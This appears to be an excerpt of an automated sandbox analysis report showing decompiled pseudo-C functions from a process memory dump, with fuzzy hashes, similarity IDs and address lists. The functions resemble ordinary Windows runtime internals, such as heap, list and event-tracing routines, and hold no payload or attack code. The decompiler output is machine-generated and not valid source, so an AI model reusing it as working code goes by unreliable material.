0x00000000
0x00f87cbd
0x00f87ce8
0x00f87cc5
0x00f87cc8
0x00f87cca
0x00f87cd0
0x00f87cd6
0x00f87cde
0x00f87ce4
0x00f87ce4
0x00f87cd0
0x00000000
0x00f87ce8
0x00f1c990
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e4373fe033d7e9d691d61f397fab06fadd5f22b9e20c33a8c5a39b128ed405c
Instruction ID: 4332953110787696a0beb78560e1ec99218bcd6798757e2bc8f841dd7ed06110
Opcode Fuzzy Hash: 6e4373fe033d7e9d691d61f397fab06fadd5f22b9e20c33a8c5a39b128ed405c
Instruction Fuzzy Hash: AD1102327047029BC711BF29DC85AAA77A1FB85320F200228F88183691DB28EC14E7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00F537F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00F537F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E00F32280(_t6, 0x1008550);
				}
				_t29 = E00F5387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E00F2FFB0(0x1008550, _t27, 0x1008550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x00f537fa
0x00f537fc
0x00f53805
0x00f53808
0x00f53808
0x00f53814
0x00f53818
0x00f53846
0x00f53848
0x00f5384b
0x00f5384b
0x00f53852
0x00000000
0x00f53854
0x00f53856
0x00000000
0x00000000
0x00f53863
0x00000000
0x00f53863
0x00f5381a
0x00f5381a
0x00f5381f
0x00f5386e
0x00f5386e
0x00f53871
0x00f53873
0x00f53873
0x00f53868
0x00000000
0x00f53868
0x00f53821
0x00f53826
0x00000000
0x00000000
0x00f53828
0x00f5382a
0x00f53841
0x00000000
0x00f53841

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb2bdf6f97c07ea780a0e227f3f8bffef6e8f7a19cfd0d2faf4f9765f2190911
Instruction ID: f2c989cdc5b963cbc9a6814f6ae4b1bcac7d3368026d0ad0e5faf38db2cb128a
Opcode Fuzzy Hash: fb2bdf6f97c07ea780a0e227f3f8bffef6e8f7a19cfd0d2faf4f9765f2190911
Instruction Fuzzy Hash: 6D0126B3D41A209BC33B8B5DD900E26BBA6EF95BB3B154069FE458B201C734DE04E780

Uniqueness

Uniqueness Score: -1.00%

Function 00F4002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F4002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E00F37D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E00F37D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E00F37D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E00F37D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x00f40032
0x00f40037
0x00f40043
0x00f84b3a
0x00f40049
0x00f40049
0x00f40049
0x00f4004e
0x00f40053
0x00f84b48
0x00f84b5a
0x00f84b4a
0x00f84b53
0x00f84b53
0x00f84b5f
0x00000000
0x00f84b61
0x00000000
0x00f84b61
0x00f40059
0x00f40059
0x00f40060
0x00f84b6f
0x00f84b6f
0x00f40069
0x00f84b83
0x00000000
0x00000000
0x00f84b90
0x00f84b9b
0x00f84b9b
0x00f84ba4
0x00000000
0x00000000
0x00f84baa
0x00000000
0x00f4006f
0x00f4006f
0x00000000
0x00f4006f
0x00f40069

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 25712348bc5e1be6db0952246288703963de1b85ededabb9e9cd8a1d3bc5373e
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 9911A172A066828FD722A728D945B757BD4AF81774F1900A0EE1487692DB38EC41F364

Uniqueness

Uniqueness Score: -1.00%

Function 00F2766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00F2766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E00F4F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E00F4F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L00F34620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x00f27672
0x00f2767f
0x00f27689
0x00f276de
0x00f276de
0x00f2768b
0x00f27691
0x00f27693
0x00f27697
0x00000000
0x00f27699
0x00f276a8
0x00000000
0x00f276aa
0x00f276ad
0x00f276b1
0x00000000
0x00f276b3
0x00f276b3
0x00f276b5
0x00f276ba
0x00f276bc
0x00f276bc
0x00f276c0
0x00000000
0x00f276c2
0x00f276ce
0x00f276ce
0x00f276c0
0x00f276b1
0x00f276a8
0x00f27697
0x00f276d9

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: a00c311fc44f0b444c40c32d15251f5b5796cf5b8fd7a1024740d8a484ac4f0b
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 86018832704629ABC720AEDEDC51E5B7BADEB84760F240574B908DB250DA30DD01A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F19080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00F19080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x10085ec;
				E00F32280(_t48, 0x10085ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E00F2FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x100538c; // 0x77ad6828
					if( *_t84 != 0x1005388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0xfef6e8);
						E00F6D0E8(0x10085ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E00FE88F5(_t80, _t85, 0x1005388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x10086c0; // 0xaa07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x10086b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E00F32280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E00FE88F5(0x10085ec, _t85, 0x1005388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E00F5AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x100b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x10084c0;
																			if(_t82 >=  *0x10084c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E00FE9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E00F1922A(_t99);
										_t64 = E00F37D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E00FE8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x10086c0; // 0xaa07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x10086b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x10086bc;
													_t87 = 0x10086b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E00F19240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x10086c4;
												_t87 = 0x10086c0;
												L27:
												E00F49B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E00F6D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1005388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x100538c = _t51;
						goto L6;
					}
				}
			}

0x00f19082
0x00f19083
0x00f19084
0x00f19085
0x00f19087
0x00f19096
0x00f19098
0x00f19098
0x00f1909e
0x00f190a8
0x00f190e7
0x00f190e7
0x00f190aa
0x00f190b0
0x00f190b7
0x00f190bd
0x00f190dd
0x00f190e6
0x00f190bf
0x00f190bf
0x00f190c7
0x00f190cf
0x00f190f1
0x00f190f2
0x00f190f4
0x00f190f5
0x00f190f6
0x00f190f7
0x00f190f8
0x00f190f9
0x00f190fa
0x00f190fb
0x00f190fc
0x00f190fd
0x00f190fe
0x00f190ff
0x00f19100
0x00f19102
0x00f19107
0x00f1910c
0x00f19110
0x00f19113
0x00f19115
0x00f19136
0x00f1913f
0x00f19143
0x00f737e4
0x00f737e4
0x00f19117
0x00f19117
0x00f1911d
0x00000000
0x00f1911f
0x00f1911f
0x00f19125
0x00000000
0x00f19127
0x00f1912d
0x00f19130
0x00f19134
0x00f19158
0x00f1915d
0x00f19161
0x00f19168
0x00f73715
0x00f1916e
0x00f1916e
0x00f19175
0x00f19177
0x00f1917e
0x00f1917f
0x00f19182
0x00f19182
0x00f19187
0x00f19187
0x00f1918a
0x00f1918d
0x00f1918f
0x00f19192
0x00f19195
0x00f19198
0x00f19198
0x00f19198
0x00f1919a
0x00000000
0x00000000
0x00f7371f
0x00f73721
0x00f73727
0x00f7372f
0x00f73733
0x00f73735
0x00f73738
0x00f7373b
0x00f7373d
0x00f73740
0x00000000
0x00f73746
0x00f73746
0x00f73749
0x00000000
0x00f7374f
0x00f7374f
0x00f73751
0x00f73757
0x00f73759
0x00f7375c
0x00f7375c
0x00f7375e
0x00f7375e
0x00f73761
0x00f73764
0x00000000
0x00000000
0x00f73766
0x00f73768
0x00f737a3
0x00f737a3
0x00f737a5
0x00f737a7
0x00f737ad
0x00f737b0
0x00f737b2
0x00f737bc
0x00f737c2
0x00f737c2
0x00f737b2
0x00f19187
0x00f19187
0x00f1918a
0x00f1918d
0x00f1918f
0x00f19192
0x00f19195
0x00000000
0x00f19195
0x00000000
0x00f7376a
0x00f7376a
0x00f7376a
0x00f7376c
0x00f7376c
0x00f7376f
0x00f73775
0x00000000
0x00000000
0x00f73777
0x00f73779
0x00f73782
0x00f73787
0x00f73789
0x00f73790
0x00f73790
0x00f7378b
0x00f7378b
0x00f7378b
0x00f73792
0x00f73795
0x00000000
0x00f73795
0x00000000
0x00f73779
0x00f73798
0x00000000
0x00f73798
0x00000000
0x00f73768
0x00f7379b
0x00f7379b
0x00f73751
0x00f73749
0x00000000
0x00f73740
0x00f191a0
0x00f191a3
0x00f191a9
0x00f191b0
0x00000000
0x00f191b0
0x00f19187
0x00f191b4
0x00f191b4
0x00f191bb
0x00f191c0
0x00f191c5
0x00f191c7
0x00f737da
0x00f191cd
0x00f191cd
0x00f191cd
0x00f191d2
0x00f191d5
0x00f19239
0x00f19239
0x00f191d7
0x00f191db
0x00f191e1
0x00f191e7
0x00f191fd
0x00f19203
0x00f1921e
0x00f19223
0x00000000
0x00f19205
0x00f19205
0x00f19208
0x00f1920c
0x00f19214
0x00f19214
0x00f1920c
0x00f191e9
0x00f191e9
0x00f191ee
0x00f191f3
0x00f191f3
0x00f191f3
0x00f191e7
0x00000000
0x00000000
0x00000000
0x00f19134
0x00f19125
0x00f1911d
0x00f1914e
0x00f190d1
0x00f190d1
0x00f190d3
0x00f190d6
0x00f190d8
0x00000000
0x00f190d8
0x00f190cf

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bb3ec0594afd2bb0113ddc6bb26acc0d295c6989a02415644f6a372d3750810
Instruction ID: b9c7a78f91940f80c9bb17f1953d622f8a68d24c4d54b0c126e9394a69d17064
Opcode Fuzzy Hash: 4bb3ec0594afd2bb0113ddc6bb26acc0d295c6989a02415644f6a372d3750810
Instruction Fuzzy Hash: 6201F4729053008FD3258F24DC50B2277B9FB49320F218026E1058B691C7B5DC81DFE0

Uniqueness

Uniqueness Score: -1.00%

Function 00FAC450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00FAC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E00F59910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E00F595B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E00F595D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E00F595D0();
				return L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x00fac458
0x00fac45d
0x00fac466
0x00fac468
0x00fac469
0x00fac46a
0x00fac46b
0x00fac46e
0x00fac46f
0x00fac471
0x00fac476
0x00fac476
0x00fac47c
0x00fac47e
0x00fac480
0x00fac480
0x00fac483
0x00fac484
0x00fac486
0x00fac488
0x00fac48f
0x00fac491
0x00fac493
0x00fac493
0x00fac48f
0x00fac498
0x00fac49e
0x00fac4ad
0x00fac4ad
0x00fac4b2
0x00fac4b4
0x00fac4cd

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 9826925f481a8b9069462f747c92487282cb9445353b58063ede9acab7efe19c
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: BD01DEB2140609FFD726AF25CC81E62F7ADFF493A1F004125F60442561DB26ACA0EAE0

Uniqueness

Uniqueness Score: -1.00%

Function 00FE4015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00FE4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E00F32280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E00F32280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x10086ac);
					E00F1F900(0x10086d4, _t28);
					E00F2FFB0(0x10086ac, _t28, 0x10086ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E00F2FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x00fe401a
0x00fe401e
0x00fe4023
0x00fe4028
0x00fe4029
0x00fe402b
0x00fe402f
0x00fe4043
0x00fe4046
0x00fe4051
0x00fe4057
0x00fe405f
0x00fe4062
0x00fe4067
0x00fe406f
0x00fe407c
0x00fe407c
0x00fe408c
0x00fe408c
0x00fe4097

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40cccb04615b4bc472a9f103ee55caecae7b3b1c001cbfbb84e11f0d0a99af33
Instruction ID: a87265432e67eeaad25a082e8e65fc0a185419e0e32c11ccaf6af586df083144
Opcode Fuzzy Hash: 40cccb04615b4bc472a9f103ee55caecae7b3b1c001cbfbb84e11f0d0a99af33
Instruction Fuzzy Hash: B80184716016857FD251BB69CD81E13B7ACFB49760F000239B60887A52CB28EC11D6E4

Uniqueness

Uniqueness Score: -1.00%

Function 00FD14FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00FD14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x100d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E00F5FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E00F37D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00F5B640(E00F59AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x00fd14fb
0x00fd14fb
0x00fd150a
0x00fd1514
0x00fd1519
0x00fd151b
0x00fd1526
0x00fd152c
0x00fd1534
0x00fd1537
0x00fd153a
0x00fd1545
0x00fd1557
0x00fd1547
0x00fd1550
0x00fd1550
0x00fd1562
0x00fd1563
0x00fd1565
0x00fd156a
0x00fd157f

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59248f02b8359f32961b09f3ee93d7e7e18c993ae1481be5a444221e43798fae
Instruction ID: 38374c8da0c4b2f0661b3c6b06bb9658c1769cb05ba956084c2d94e8a84917e2
Opcode Fuzzy Hash: 59248f02b8359f32961b09f3ee93d7e7e18c993ae1481be5a444221e43798fae
Instruction Fuzzy Hash: 7D018071A00248ABDB14EFA8D842FAEB7B8EF44710F044066B904EB381D678DA04DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00FD138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00FD138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x100d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E00F5FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E00F37D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00F5B640(E00F59AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x00fd138a
0x00fd138a
0x00fd1399
0x00fd13a3
0x00fd13a8
0x00fd13aa
0x00fd13b5
0x00fd13bb
0x00fd13c3
0x00fd13c6
0x00fd13c9
0x00fd13d4
0x00fd13e6
0x00fd13d6
0x00fd13df
0x00fd13df
0x00fd13f1
0x00fd13f2
0x00fd13f4
0x00fd13f9
0x00fd140e

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e9006f82b2cc1bfca64fa9d26bfcdc31dfc2e43d1fe635a3885dd7405ee02bf
Instruction ID: a828ce68fd6ac260f3b49bb201960a218700f70f8ffd9be99afbbd77bc1e5d2d
Opcode Fuzzy Hash: 3e9006f82b2cc1bfca64fa9d26bfcdc31dfc2e43d1fe635a3885dd7405ee02bf
Instruction Fuzzy Hash: 5A015271E04218AFCB14EFA9D842FAEB7B8EF44710F044066BD04EB381D679DA05D795

Uniqueness

Uniqueness Score: -1.00%

Function 00F158EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00F158EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x100d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0xef5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E00F15943() != 0 &&  *0x1005320 > 5) {
					E00F97B5E( &_v44, _t27);
					_t22 =  &_v28;
					E00F97B5E( &_v28, _t28);
					_t11 = E00F97B9C(0x1005320, 0xefbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E00F5B640(_t11, _t17, _v8 ^ _t29, 0xefbf15, _t27, _t28);
			}

0x00f158fb
0x00f158fe
0x00f15906
0x00f1590a
0x00f1593c
0x00f1593c
0x00f1590c
0x00f1590c
0x00f15911
0x00000000
0x00f15913
0x00f15913
0x00f15913
0x00f15911
0x00f1591d
0x00f71035
0x00f7103c
0x00f7103f
0x00f71056
0x00f71056
0x00f1593b

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e42e6002bde6dd8689cc12a01e7a9aec410fccb4ec5481e1457cf1c4d2a2ab5
Instruction ID: fed1db79ba733aeb25dcc31f94707644b6c975157878abb0ba5fab92dc1a759f
Opcode Fuzzy Hash: 3e42e6002bde6dd8689cc12a01e7a9aec410fccb4ec5481e1457cf1c4d2a2ab5
